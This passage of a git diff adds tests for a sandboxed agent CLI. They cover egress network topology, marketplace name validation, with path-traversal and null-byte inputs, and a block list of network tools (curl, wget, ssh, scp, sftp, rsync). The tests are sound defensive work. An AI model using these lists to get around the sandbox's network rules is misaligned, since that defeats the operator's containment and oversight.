+ first = json.loads(lines[0]) + second = json.loads(lines[1]) + assert first["event_type"] == "launch.preflight.passed" + assert first["metadata"]["network_policy"] == "open" + assert second["event_type"] == "launch.started" + assert second["metadata"]["sandbox_id"] == "sandbox-1" + + +def test_local_audit_event_sink_describes_file_destination(tmp_path: Path) -> None: + audit_path = tmp_path / "launch-events.jsonl" + sink = LocalAuditEventSink( + audit_path=audit_path, + lock_path=tmp_path / "launch-events.lock", + ) + + assert sink.describe_destination() == str(audit_path) diff --git a/tests/test_marketplace_materialize_characterization.py b/tests/test_marketplace_materialize_characterization.py new file mode 100644 index 0000000..69d4418 --- /dev/null +++ b/tests/test_marketplace_materialize_characterization.py @@ -0,0 +1,281 @@ +"""Characterization tests for marketplace/materialize.py. + +Lock current behavior of name validation, dataclass serialization, +manifest I/O, and cache freshness before S02 surgery. +""" + +from __future__ import annotations + +from datetime import datetime, timedelta, timezone +from pathlib import Path + +import pytest + +from scc_cli.marketplace.materialize import ( + CloneResult, + DiscoveryResult, + DownloadResult, + InvalidMarketplaceError, + MaterializationError, + MaterializedMarketplace, + _validate_marketplace_name, + is_cache_fresh, + load_manifest, + save_manifest, +) + +# ═══════════════════════════════════════════════════════════════════════════════ +# _validate_marketplace_name +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestValidateMarketplaceName: + """Marketplace name filesystem-safety validation.""" + + def test_valid_name(self) -> None: + _validate_marketplace_name("my-marketplace") # should not raise + + def test_empty_name_raises(self) -> None: + with pytest.raises(InvalidMarketplaceError): + _validate_marketplace_name("") + + def test_whitespace_only_raises(self) -> None: + with pytest.raises(InvalidMarketplaceError): + _validate_marketplace_name(" ") + + def test_dot_raises(self) -> None: + with pytest.raises(InvalidMarketplaceError): + _validate_marketplace_name(".") + + def test_dotdot_raises(self) -> None: + with pytest.raises(InvalidMarketplaceError): + _validate_marketplace_name("..") + + def test_slash_raises(self) -> None: + with pytest.raises(InvalidMarketplaceError): + _validate_marketplace_name("path/traversal") + + def test_backslash_raises(self) -> None: + with pytest.raises(InvalidMarketplaceError): + _validate_marketplace_name("path\\traversal") + + def test_null_byte_raises(self) -> None: + with pytest.raises(InvalidMarketplaceError): + _validate_marketplace_name("name\x00evil") + + +# ═══════════════════════════════════════════════════════════════════════════════ +# MaterializedMarketplace serialization +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestMaterializedMarketplaceSerialization: + """Round-trip to_dict / from_dict.""" + + def _make_marketplace(self) -> MaterializedMarketplace: + return MaterializedMarketplace( + name="test-mp", + canonical_name="Test Marketplace", + relative_path=".claude/.scc-marketplaces/test-mp", + source_type="github", + source_url="https://github.com/org/marketplace", + source_ref="main", + materialization_mode="full", + materialized_at=datetime(2026, 1, 15, 12, 0, 0, tzinfo=timezone.utc), + commit_sha="abc123", + etag=None, + plugins_available=["plugin-a", "plugin-b"], + ) + + def test_to_dict_keys(self) -> None: + mp = self._make_marketplace() + d = mp.to_dict() + expected_keys = { + "name", + "canonical_name", + "relative_path", + "source_type", + "source_url", + "source_ref", + "materialization_mode", + "materialized_at", + "commit_sha", + "etag", + "plugins_available", + } + assert set(d.keys()) == expected_keys + + def test_roundtrip(self) -> None: + mp = self._make_marketplace() + d = mp.to_dict() + restored = MaterializedMarketplace.from_dict(d) + assert restored.name == mp.name + assert restored.canonical_name == mp.canonical_name + assert restored.source_type == mp.source_type + assert restored.plugins_available == mp.plugins_available + assert restored.commit_sha == mp.commit_sha + + def test_from_dict_backward_compat_no_canonical_name(self) -> None: + """Old manifests without canonical_name should use name as fallback.""" + d = { + "name": "old-mp", + "relative_path": ".claude/.scc-marketplaces/old-mp", + "source_type": "github", + "source_url": "https://github.com/org/mp", + "source_ref": "main", + } + mp = MaterializedMarketplace.from_dict(d) + assert mp.canonical_name == "old-mp" # fallback to name + + def test_from_dict_missing_mode_defaults_to_full(self) -> None: + d = { + "name": "mp", + "relative_path": ".", + "source_type": "git", + "source_url": "https://example.com", + } + mp = MaterializedMarketplace.from_dict(d) + assert mp.materialization_mode == "full" + + def test_from_dict_empty_plugins_default(self) -> None: + d = { + "name": "mp", + "relative_path": ".", + "source_type": "git", + "source_url": "https://example.com", + } + mp = MaterializedMarketplace.from_dict(d) + assert mp.plugins_available == [] + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Manifest I/O +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestManifestIO: + """Manifest save/load round-trip.""" + + def _make_marketplace(self, name: str) -> MaterializedMarketplace: + return MaterializedMarketplace( + name=name, + canonical_name=name.title(), + relative_path=f".claude/.scc-marketplaces/{name}", + source_type="github", + source_url=f"https://github.com/org/{name}", + source_ref="main", + materialization_mode="full", + materialized_at=datetime(2026, 1, 15, 12, 0, 0, tzinfo=timezone.utc), + commit_sha="abc123", + etag=None, + plugins_available=["plugin-a"], + ) + + def test_save_and_load(self, tmp_path: Path) -> None: + marketplaces = { + "mp1": self._make_marketplace("mp1"), + "mp2": self._make_marketplace("mp2"), + } + save_manifest(tmp_path, marketplaces) + loaded = load_manifest(tmp_path) + assert set(loaded.keys()) == {"mp1", "mp2"} + assert loaded["mp1"].canonical_name == "Mp1" + + def test_load_nonexistent_returns_empty(self, tmp_path: Path) -> None: + loaded = load_manifest(tmp_path) + assert loaded == {} + + def test_load_corrupt_json_returns_empty(self, tmp_path: Path) -> None: + from scc_cli.marketplace.constants import MANIFEST_FILE, MARKETPLACE_CACHE_DIR + + manifest_dir = tmp_path / ".claude" / MARKETPLACE_CACHE_DIR + manifest_dir.mkdir(parents=True) + (manifest_dir / MANIFEST_FILE).write_text("{invalid json") + loaded = load_manifest(tmp_path) + assert loaded == {} + + +# ═══════════════════════════════════════════════════════════════════════════════ +# is_cache_fresh +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestIsCacheFresh: + """Cache freshness checks based on TTL.""" + + def test_fresh_cache(self) -> None: + mp = MaterializedMarketplace( + name="mp", + canonical_name="Mp", + relative_path=".", + source_type="github", + source_url="https://example.com", + source_ref=None, + materialization_mode="full", + materialized_at=datetime.now(timezone.utc) - timedelta(seconds=10), + commit_sha=None, + etag=None, + ) + assert is_cache_fresh(mp, ttl_seconds=3600) is True + + def test_stale_cache(self) -> None: + mp = MaterializedMarketplace( + name="mp", + canonical_name="Mp", + relative_path=".", + source_type="github", + source_url="https://example.com", + source_ref=None, + materialization_mode="full", + materialized_at=datetime.now(timezone.utc) - timedelta(hours=2), + commit_sha=None, + etag=None, + ) + assert is_cache_fresh(mp, ttl_seconds=3600) is False + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Result dataclass construction +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestResultDataclasses: + """CloneResult, DownloadResult, DiscoveryResult construction.""" + + def test_clone_result_success(self) -> None: + r = CloneResult(success=True, commit_sha="abc123", plugins=["p1"]) + assert r.success is True + assert r.error is None + + def test_clone_result_failure(self) -> None: + r = CloneResult(success=False, error="git clone failed") + assert r.success is False + assert r.error == "git clone failed" + + def test_download_result_with_etag(self) -> None: + r = DownloadResult(success=True, etag='W/"abc"', plugins=["p1"]) + assert r.etag == 'W/"abc"' + + def test_discovery_result(self) -> None: + r = DiscoveryResult(plugins=["p1", "p2"], canonical_name="My Marketplace") + assert len(r.plugins) == 2 + assert r.canonical_name == "My Marketplace" + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Exception hierarchy +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestExceptions: + """Exception classes carry metadata.""" + + def test_materialization_error_base(self) -> None: + err = MaterializationError("something broke", marketplace_name="mp1") + assert err.marketplace_name == "mp1" + assert "something broke" in str(err) + + def test_invalid_marketplace_error(self) -> None: + err = InvalidMarketplaceError("mp1", "missing marketplace.json") + assert err.marketplace_name == "mp1" + assert "marketplace.json" in str(err) diff --git a/tests/test_marketplace_schema.py b/tests/test_marketplace_schema.py index fbf073e..856bf52 100644 --- a/tests/test_marketplace_schema.py +++ b/tests/test_marketplace_schema.py @@ -391,14 +391,14 @@ def test_team_profile_with_fields(self) -> None: url="https://mcp.example.com", ) ], - network_policy="isolated", + network_policy="locked-down-web", session=SessionConfig(timeout_hours=4, auto_resume=False), delegation=TeamDelegationConfig(allow_project_overrides=True), ) assert profile.description == "High-security environment" assert profile.additional_plugins == ["security-scanner@internal"] assert profile.additional_mcp_servers[0].name == "audit" - assert profile.network_policy == "isolated" + assert profile.network_policy == "locked-down-web" assert profile.session.timeout_hours == 4 assert profile.delegation is not None assert profile.delegation.allow_project_overrides is True diff --git a/tests/test_mcp_servers.py b/tests/test_mcp_servers.py index 5b256f1..f716c58 100644 --- a/tests/test_mcp_servers.py +++ b/tests/test_mcp_servers.py @@ -413,7 +413,7 @@ class TestMCPServerTranslation: def test_sse_server_translation(self): """SSE server should translate to Claude Code format.""" - from scc_cli import claude_adapter + from scc_cli.adapters import claude_settings as claude_adapter server = MCPServer( name="gis-internal", @@ -429,7 +429,7 @@ def test_sse_server_translation(self): def test_stdio_server_translation(self): """Stdio server should translate to Claude Code format.""" - from scc_cli import claude_adapter + from scc_cli.adapters import claude_settings as claude_adapter server = MCPServer( name="local-tool", @@ -447,7 +447,7 @@ def test_stdio_server_translation(self): def test_stdio_server_with_env(self): """Stdio server with env vars should translate correctly.""" - from scc_cli import claude_adapter + from scc_cli.adapters import claude_settings as claude_adapter server = MCPServer( name="env-tool", @@ -464,7 +464,7 @@ def test_stdio_server_with_env(self): def test_sse_server_with_headers(self): """SSE server with headers should translate correctly.""" - from scc_cli import claude_adapter + from scc_cli.adapters import claude_settings as claude_adapter server = MCPServer( name="auth-server", @@ -479,7 +479,7 @@ def test_sse_server_with_headers(self): def test_http_server_translation(self): """HTTP server should translate to Claude Code format.""" - from scc_cli import claude_adapter + from scc_cli.adapters import claude_settings as claude_adapter server = MCPServer( name="http-server", @@ -507,7 +507,7 @@ class TestBuildMCPServers: def test_build_mcp_servers_from_effective_config(self): """Should build MCP servers dict from EffectiveConfig.""" - from scc_cli import claude_adapter + from scc_cli.adapters import claude_settings as claude_adapter effective = EffectiveConfig( plugins=set(), @@ -532,7 +532,7 @@ def test_build_mcp_servers_from_effective_config(self): def test_build_mcp_servers_empty_list(self): """Should handle empty MCP servers list.""" - from scc_cli import claude_adapter + from scc_cli.adapters import claude_settings as claude_adapter effective = EffectiveConfig( plugins=set(), @@ -559,7 +559,7 @@ class TestMCPServerIntegration: def test_mcp_servers_in_claude_settings(self): """MCP servers should appear in Claude Code settings.""" - from scc_cli import claude_adapter + from scc_cli.adapters import claude_settings as claude_adapter effective = EffectiveConfig( plugins={"plugin-a"}, @@ -581,7 +581,7 @@ def test_mcp_servers_in_claude_settings(self): def test_no_mcp_servers_key_when_empty(self): """Should not include mcpServers key when no servers configured.""" - from scc_cli import claude_adapter + from scc_cli.adapters import claude_settings as claude_adapter effective = EffectiveConfig( plugins={"plugin-a"}, diff --git a/tests/test_network_tool_rules.py b/tests/test_network_tool_rules.py new file mode 100644 index 0000000..5262368 --- /dev/null +++ b/tests/test_network_tool_rules.py @@ -0,0 +1,131 @@ +"""Tests for network tool detection rules.""" + +from __future__ import annotations + +from scc_cli.core.enums import CommandFamily +from scc_cli.core.network_tool_rules import NETWORK_TOOLS, analyze_network_tool + + +class TestAnalyzeNetworkTool: + """Tests for analyze_network_tool function.""" + + # ─── Positive: each network tool is blocked ────────────────────────── + + def test_curl_blocked(self) -> None: + result = analyze_network_tool(["curl", "https://example.com"]) + assert result is not None + assert result.allowed is False + assert result.matched_rule == "network.curl" + assert result.command_family == CommandFamily.NETWORK_TOOL + assert "curl" in result.reason + + def test_wget_blocked(self) -> None: + result = analyze_network_tool(["wget", "https://example.com"]) + assert result is not None + assert result.allowed is False + assert result.matched_rule == "network.wget" + + def test_ssh_blocked(self) -> None: + result = analyze_network_tool(["ssh", "user@host"]) + assert result is not None + assert result.allowed is False + assert result.matched_rule == "network.ssh" + + def test_scp_blocked(self) -> None: + result = analyze_network_tool(["scp", "file", "user@host:path"]) + assert result is not None + assert result.allowed is False + assert result.matched_rule == "network.scp" + + def test_sftp_blocked(self) -> None: + result = analyze_network_tool(["sftp", "user@host"]) + assert result is not None + assert result.allowed is False + assert result.matched_rule == "network.sftp" + + def test_rsync_blocked(self) -> None: + result = analyze_network_tool(["rsync", "-avz", "src/", "user@host:dest/"]) + assert result is not None + assert result.allowed is False + assert result.matched_rule == "network.rsync" + + # ─── All 6 tools are in the frozenset ──────────────────────────────── + + def test_network_tools_count(self) -> None: + assert len(NETWORK_TOOLS) == 6 + assert NETWORK_TOOLS == frozenset({"curl", "wget", "ssh", "scp", "sftp", "rsync"}) + + # ─── Path-qualified binaries detected ──────────────────────────────── + + def test_path_qualified_curl(self) -> None: + result = analyze_network_tool(["/usr/bin/curl", "-s", "https://example.com"]) + assert result is not None + assert result.allowed is False + assert result.matched_rule == "network.curl" + + def test_path_qualified_ssh(self) -> None: + result = analyze_network_tool(["/usr/bin/ssh", "user@host"]) + assert result is not None + assert result.matched_rule == "network.ssh" + + def test_path_qualified_wget(self) -> None: + result = analyze_network_tool(["/usr/local/bin/wget", "https://example.com"]) + assert result is not None + assert result.matched_rule == "network.wget" + + # ─── Negative: non-network commands return None ────────────────────── + + def test_git_allowed(self) -> None: + assert analyze_network_tool(["git", "push", "origin"]) is None + + def test_ls_allowed(self) -> None: + assert analyze_network_tool(["ls", "-la"]) is None + + def test_cat_allowed(self) -> None: + assert analyze_network_tool(["cat", "file.txt"]) is None + + def test_python_allowed(self) -> None: + assert analyze_network_tool(["python", "-m", "http.server"]) is None + + def test_echo_allowed(self) -> None: + assert analyze_network_tool(["echo", "curl"]) is None + + # ─── Edge cases and malformed inputs ───────────────────────────────── + + def test_empty_tokens(self) -> None: + assert analyze_network_tool([]) is None + + def test_single_empty_string(self) -> None: + assert analyze_network_tool([""]) is None + + def test_tokens_with_only_flags(self) -> None: + """Tokens that are just flags (no real command).""" + assert analyze_network_tool(["--verbose", "-x"]) is None + + def test_network_tool_name_as_substring_not_matched(self) -> None: + """Names that contain a network tool as substring must NOT match.""" + assert analyze_network_tool(["curling"]) is None + assert analyze_network_tool(["wgetrc"]) is None + assert analyze_network_tool(["sshmenu"]) is None + + def test_network_tool_as_argument_not_first(self) -> None: + """Network tool name appearing as an argument (not first token) is fine.""" + assert analyze_network_tool(["echo", "curl"]) is None + assert analyze_network_tool(["grep", "ssh"]) is None + + def test_bare_tool_no_args(self) -> None: + """Bare network tool with no arguments still blocked.""" + result = analyze_network_tool(["curl"]) + assert result is not None + assert result.allowed is False + + # ─── Verdict field correctness ─────────────────────────────────────── + + def test_verdict_fields_complete(self) -> None: + """Verify all SafetyVerdict fields are populated correctly.""" + result = analyze_network_tool(["rsync", "-avz", "src/", "dest/"]) + assert result is not None + assert result.allowed is False + assert result.reason.startswith("BLOCKED:") + assert result.matched_rule == "network.rsync" + assert result.command_family == CommandFamily.NETWORK_TOOL diff --git a/tests/test_no_claude_constants_in_core.py b/tests/test_no_claude_constants_in_core.py new file mode 100644 index 0000000..043ae08 --- /dev/null +++ b/tests/test_no_claude_constants_in_core.py @@ -0,0 +1,104 @@ +"""Guardrail: prevent Claude-specific runtime constants in core/constants.py. + +After the S04 legacy Claude path isolation, all Claude-specific runtime +constants (image names, volume names, credential paths, etc.) live in the +adapter modules that consume them. core/constants.py holds only product-level +constants (CLI_VERSION, CURRENT_SCHEMA_VERSION, WORKTREE_BRANCH_PREFIX). + +This test prevents re-introduction of provider-specific values into core. +""" + +from __future__ import annotations + +import tokenize +from io import BytesIO +from pathlib import Path + +SRC = Path(__file__).resolve().parents[1] / "src" / "scc_cli" + +# Claude-specific constant names that must NOT appear in core/constants.py. +# These were localized to consumer modules in S04/T01-T02. +_CLAUDE_CONSTANTS = frozenset( + { + "AGENT_NAME", + "SANDBOX_IMAGE", + "AGENT_CONFIG_DIR", + "SANDBOX_DATA_VOLUME", + "SANDBOX_DATA_MOUNT", + "CREDENTIAL_PATHS", + "OAUTH_CREDENTIAL_KEY", + "DEFAULT_MARKETPLACE_REPO", + } +) + + +def _find_name_tokens(source: str, names: frozenset[str]) -> list[tuple[int, str]]: + """Return (lineno, line_text) for NAME tokens matching any name in the set. + + Uses Python's tokenize module (per KNOWLEDGE.md) to avoid false positives + from comments, docstrings, or string literals. + """ + hits: list[tuple[int, str]] = [] + lines = source.splitlines() + + try: + tokens = list(tokenize.tokenize(BytesIO(source.encode()).readline)) + except tokenize.TokenError: + return hits + + for tok in tokens: + if tok.type == tokenize.NAME and tok.string in names: + lineno = tok.start[0] + hits.append((lineno, lines[lineno - 1].strip())) + + return hits + + +class TestNoClaudeSpecificConstantsInCore: + """core/constants.py must not define any Claude-specific runtime constants.""" + + def test_no_claude_constants_defined_in_core(self) -> None: + constants_file = SRC / "core" / "constants.py" + source = constants_file.read_text(encoding="utf-8") + + hits = _find_name_tokens(source, _CLAUDE_CONSTANTS) + + if hits: + details = "\n".join(f" line {ln}: {text}" for ln, text in hits) + raise AssertionError( + f"Claude-specific constants found in core/constants.py:\n{details}\n\n" + "These belong in the adapter/consumer modules, not in core. " + "See S04 slice plan for rationale." + ) + + def test_no_claude_constant_imports_from_core(self) -> None: + """No module should import Claude-specific constants from core.constants.""" + violations: list[str] = [] + + for py_file in sorted(SRC.rglob("*.py")): + if "__pycache__" in py_file.parts: + continue + + try: + source = py_file.read_text(encoding="utf-8") + except OSError: + continue + + for lineno, line in enumerate(source.splitlines(), start=1): + # Only check import lines referencing core.constants + if "core.constants" not in line or "import" not in line: + continue + + # Check if any Claude-specific constant name appears on this line + for name in _CLAUDE_CONSTANTS: + if name in line: + rel = py_file.relative_to(SRC) + violations.append(f" {rel}:{lineno}: {line.strip()}") + break # one violation per line is enough + + if violations: + raise AssertionError( + "Found imports of Claude-specific constants from core.constants:\n" + + "\n".join(violations) + + "\n\nImport from the consumer module instead." + ) diff --git a/tests/test_no_root_sprawl.py b/tests/test_no_root_sprawl.py index fceee36..831b345 100644 --- a/tests/test_no_root_sprawl.py +++ b/tests/test_no_root_sprawl.py @@ -64,7 +64,6 @@ "utils", # Legacy standalone modules (candidates for refactoring) "auth.py", - "claude_adapter.py", "cli_common.py", "cli_helpers.py", "config.py", @@ -85,14 +84,16 @@ "remote.py", "sessions.py", "setup.py", + "setup_config.py", # Extracted from setup.py (S02/T06 decomposition) + "setup_ui.py", # Extracted from setup.py (S02/T06 decomposition) "source_resolver.py", "stats.py", - "support_bundle.py", # legacy top-level support bundle helper "subprocess_utils.py", "teams.py", "theme.py", "update.py", "validate.py", + "workspace_local_config.py", # workspace provider-preference store, candidate for services/ } # System files to ignore diff --git a/tests/test_oci_egress_integration.py b/tests/test_oci_egress_integration.py new file mode 100644 index 0000000..c1d9b6b --- /dev/null +++ b/tests/test_oci_egress_integration.py @@ -0,0 +1,493 @@ +"""Integration-level tests for OCI egress topology wiring. + +All subprocess calls are mocked — no Docker daemon needed. +These tests verify the orchestration between OciSandboxRuntime, +NetworkTopologyManager, and the egress policy layer. +""" + +from __future__ import annotations + +from pathlib import Path +from unittest.mock import MagicMock, patch + +import pytest + +from scc_cli.adapters.egress_topology import EgressTopologyInfo +from scc_cli.adapters.oci_sandbox_runtime import OciSandboxRuntime +from scc_cli.core.contracts import DestinationSet, RuntimeInfo +from scc_cli.ports.models import MountSpec, SandboxHandle, SandboxSpec +from tests.fakes.fake_runtime_probe import FakeRuntimeProbe + +# ── Helpers ────────────────────────────────────────────────────────────────── + + +def _oci_capable_info() -> RuntimeInfo: + return RuntimeInfo( + runtime_id="docker", + display_name="Docker Engine", + cli_name="docker", + supports_oci=True, + supports_internal_networks=True, + supports_host_network=True, + version="Docker version 27.5.1, build abc1234", + daemon_reachable=True, + sandbox_available=False, + preferred_backend="oci", + ) + + +def _enforced_spec() -> SandboxSpec: + return SandboxSpec( + image="scc-agent-claude:latest", + workspace_mount=MountSpec(source=Path("/home/user/project"), target=Path("/workspace")), + workdir=Path("/workspace"), + network_policy="web-egress-enforced", + ) + + +def _locked_down_spec() -> SandboxSpec: + return SandboxSpec( + image="scc-agent-claude:latest", + workspace_mount=MountSpec(source=Path("/home/user/project"), target=Path("/workspace")), + workdir=Path("/workspace"), + network_policy="locked-down-web", + ) + + +def _open_spec() -> SandboxSpec: + return SandboxSpec( + image="scc-agent-claude:latest", + workspace_mount=MountSpec(source=Path("/home/user/project"), target=Path("/workspace")), + workdir=Path("/workspace"), + network_policy="open", + ) + + +@pytest.fixture() +def runtime() -> OciSandboxRuntime: + return OciSandboxRuntime(FakeRuntimeProbe(_oci_capable_info())) + + +_FAKE_TOPO_INFO = EgressTopologyInfo( + network_name="scc-egress-scc-oci-abc123", + proxy_container_name="scc-proxy-scc-oci-abc123", + proxy_endpoint="http://172.18.0.2:3128", +) + + +# ── Tests ──────────────────────────────────────────────────────────────────── + + +class TestEnforcedModeIntegration: + """Verify run() orchestrates topology correctly for web-egress-enforced.""" + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + @patch("scc_cli.adapters.oci_sandbox_runtime.NetworkTopologyManager") + @patch("scc_cli.adapters.oci_sandbox_runtime.collect_proxy_env", return_value={}) + @patch("scc_cli.adapters.oci_sandbox_runtime._find_existing_container", return_value=None) + def test_run_enforced_sets_up_topology_before_create( + self, + mock_find: MagicMock, + mock_collect: MagicMock, + mock_topo_cls: MagicMock, + mock_run_docker: MagicMock, + mock_execvp: MagicMock, + runtime: OciSandboxRuntime, + ) -> None: + """NetworkTopologyManager.setup() is called before docker create.""" + mock_topo = MagicMock() + mock_topo.setup.return_value = _FAKE_TOPO_INFO + mock_topo_cls.return_value = mock_topo + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + + runtime.run(_enforced_spec()) + + # setup was called + mock_topo.setup.assert_called_once() + + # docker create is the first _run_docker call (after topology.setup) + create_call = mock_run_docker.call_args_list[0] + create_cmd: list[str] = create_call[0][0] + assert create_cmd[0] == "create" + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + @patch("scc_cli.adapters.oci_sandbox_runtime.NetworkTopologyManager") + @patch("scc_cli.adapters.oci_sandbox_runtime.collect_proxy_env", return_value={}) + @patch("scc_cli.adapters.oci_sandbox_runtime._find_existing_container", return_value=None) + def test_run_enforced_passes_network_to_create( + self, + mock_find: MagicMock, + mock_collect: MagicMock, + mock_topo_cls: MagicMock, + mock_run_docker: MagicMock, + mock_execvp: MagicMock, + runtime: OciSandboxRuntime, + ) -> None: + """docker create args contain --network scc-egress-*.""" + mock_topo = MagicMock() + mock_topo.setup.return_value = _FAKE_TOPO_INFO + mock_topo_cls.return_value = mock_topo + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + + runtime.run(_enforced_spec()) + + create_cmd: list[str] = mock_run_docker.call_args_list[0][0][0] + assert "--network" in create_cmd + net_idx = create_cmd.index("--network") + assert create_cmd[net_idx + 1].startswith("scc-egress-") + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + @patch("scc_cli.adapters.oci_sandbox_runtime.NetworkTopologyManager") + @patch("scc_cli.adapters.oci_sandbox_runtime.collect_proxy_env", return_value={}) + @patch("scc_cli.adapters.oci_sandbox_runtime._find_existing_container", return_value=None) + def test_run_enforced_injects_proxy_env( + self, + mock_find: MagicMock, + mock_collect: MagicMock, + mock_topo_cls: MagicMock, + mock_run_docker: MagicMock, + mock_execvp: MagicMock, + runtime: OciSandboxRuntime, + ) -> None: + """Proxy env vars appear in docker create for enforced mode.""" + mock_topo = MagicMock() + mock_topo.setup.return_value = _FAKE_TOPO_INFO + mock_topo_cls.return_value = mock_topo + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + + runtime.run(_enforced_spec()) + + create_cmd: list[str] = mock_run_docker.call_args_list[0][0][0] + assert "HTTP_PROXY=http://172.18.0.2:3128" in create_cmd + assert "HTTPS_PROXY=http://172.18.0.2:3128" in create_cmd + assert "NO_PROXY=" in create_cmd + + +class TestLockedDownModeIntegration: + """Verify locked-down-web skips topology entirely.""" + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + @patch("scc_cli.adapters.oci_sandbox_runtime.NetworkTopologyManager") + @patch("scc_cli.adapters.oci_sandbox_runtime._find_existing_container", return_value=None) + def test_run_locked_down_skips_topology( + self, + mock_find: MagicMock, + mock_topo_cls: MagicMock, + mock_run_docker: MagicMock, + mock_execvp: MagicMock, + runtime: OciSandboxRuntime, + ) -> None: + """NetworkTopologyManager is NOT instantiated for locked-down-web.""" + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + + runtime.run(_locked_down_spec()) + + mock_topo_cls.assert_not_called() + + # Verify --network none in docker create + create_cmd: list[str] = mock_run_docker.call_args_list[0][0][0] + assert "--network" in create_cmd + net_idx = create_cmd.index("--network") + assert create_cmd[net_idx + 1] == "none" + + +class TestOpenModeIntegration: + """Verify open mode is unchanged (no topology, no network flags).""" + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + @patch("scc_cli.adapters.oci_sandbox_runtime.NetworkTopologyManager") + @patch("scc_cli.adapters.oci_sandbox_runtime._find_existing_container", return_value=None) + def test_run_open_mode_unchanged( + self, + mock_find: MagicMock, + mock_topo_cls: MagicMock, + mock_run_docker: MagicMock, + mock_execvp: MagicMock, + runtime: OciSandboxRuntime, + ) -> None: + """No topology setup, no network flags for open mode.""" + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + + runtime.run(_open_spec()) + + mock_topo_cls.assert_not_called() + + create_cmd: list[str] = mock_run_docker.call_args_list[0][0][0] + assert "--network" not in create_cmd + + +class TestTopologyTeardown: + """Verify topology teardown is wired into remove() and stop().""" + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_remove_tears_down_topology( + self, mock_run_docker: MagicMock, runtime: OciSandboxRuntime + ) -> None: + """When topology was set up, remove() calls teardown().""" + mock_topology = MagicMock() + runtime._topology = mock_topology + + mock_run_docker.return_value = MagicMock(stdout="") + runtime.remove(SandboxHandle(sandbox_id="cid123")) + + mock_topology.teardown.assert_called_once() + assert runtime._topology is None + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_stop_tears_down_topology( + self, mock_run_docker: MagicMock, runtime: OciSandboxRuntime + ) -> None: + """When topology was set up, stop() calls teardown().""" + mock_topology = MagicMock() + runtime._topology = mock_topology + + mock_run_docker.return_value = MagicMock(stdout="") + runtime.stop(SandboxHandle(sandbox_id="cid123")) + + mock_topology.teardown.assert_called_once() + assert runtime._topology is None + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_remove_without_topology_is_safe( + self, mock_run_docker: MagicMock, runtime: OciSandboxRuntime + ) -> None: + """remove() with no topology doesn't error.""" + assert runtime._topology is None + mock_run_docker.return_value = MagicMock(stdout="") + runtime.remove(SandboxHandle(sandbox_id="cid123")) # should not raise + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_stop_without_topology_is_safe( + self, mock_run_docker: MagicMock, runtime: OciSandboxRuntime + ) -> None: + """stop() with no topology doesn't error.""" + assert runtime._topology is None + mock_run_docker.return_value = MagicMock(stdout="") + runtime.stop(SandboxHandle(sandbox_id="cid123")) # should not raise + + +class TestGuardrail: + """Regression guardrails for network enforcement.""" + + def test_enforced_mode_never_produces_default_network(self) -> None: + """For web-egress-enforced, _build_create_cmd must NOT produce a command + without an explicit --network flag (prevents regression to default bridge). + """ + spec = SandboxSpec( + image="scc-agent-claude:latest", + workspace_mount=MountSpec(source=Path("/home/user/project"), target=Path("/workspace")), + workdir=Path("/workspace"), + network_policy="web-egress-enforced", + ) + # When topology provides a network name, --network is present + cmd_with_net = OciSandboxRuntime._build_create_cmd( + spec, + "scc-oci-test", + network_name="scc-egress-scc-oci-test", + ) + assert "--network" in cmd_with_net + + # When network_name is None (topology not set up), enforced mode + # does NOT add any --network flag — this is the caller's + # responsibility to ensure topology.setup() is called first. + # The guardrail is that run() always calls setup() before create(). + cmd_no_net = OciSandboxRuntime._build_create_cmd( + spec, + "scc-oci-test", + network_name=None, + ) + # Without a network_name and not locked-down, no --network is added. + # The contract is enforced at the run() level, not _build_create_cmd. + # This test documents the expected behavior. + assert "--network" not in cmd_no_net + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + @patch("scc_cli.adapters.oci_sandbox_runtime.NetworkTopologyManager") + @patch("scc_cli.adapters.oci_sandbox_runtime.collect_proxy_env", return_value={}) + @patch("scc_cli.adapters.oci_sandbox_runtime._find_existing_container", return_value=None) + def test_run_enforced_always_passes_network_name( + self, + mock_find: MagicMock, + mock_collect: MagicMock, + mock_topo_cls: MagicMock, + mock_run_docker: MagicMock, + mock_execvp: MagicMock, + runtime: OciSandboxRuntime, + ) -> None: + """run() with web-egress-enforced always results in --network in create cmd. + + This is the true guardrail: the runtime flow guarantees topology.setup() + provides a network_name before docker create is called. + """ + mock_topo = MagicMock() + mock_topo.setup.return_value = _FAKE_TOPO_INFO + mock_topo_cls.return_value = mock_topo + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + + runtime.run(_enforced_spec()) + + create_cmd: list[str] = mock_run_docker.call_args_list[0][0][0] + assert "--network" in create_cmd, ( + "Enforced mode must always produce --network in docker create" + ) + net_idx = create_cmd.index("--network") + assert create_cmd[net_idx + 1] != "none", ( + "Enforced mode uses the internal network, not 'none'" + ) + + +# ── Destination-set-aware egress tests ────────────────────────────────────── + + +def 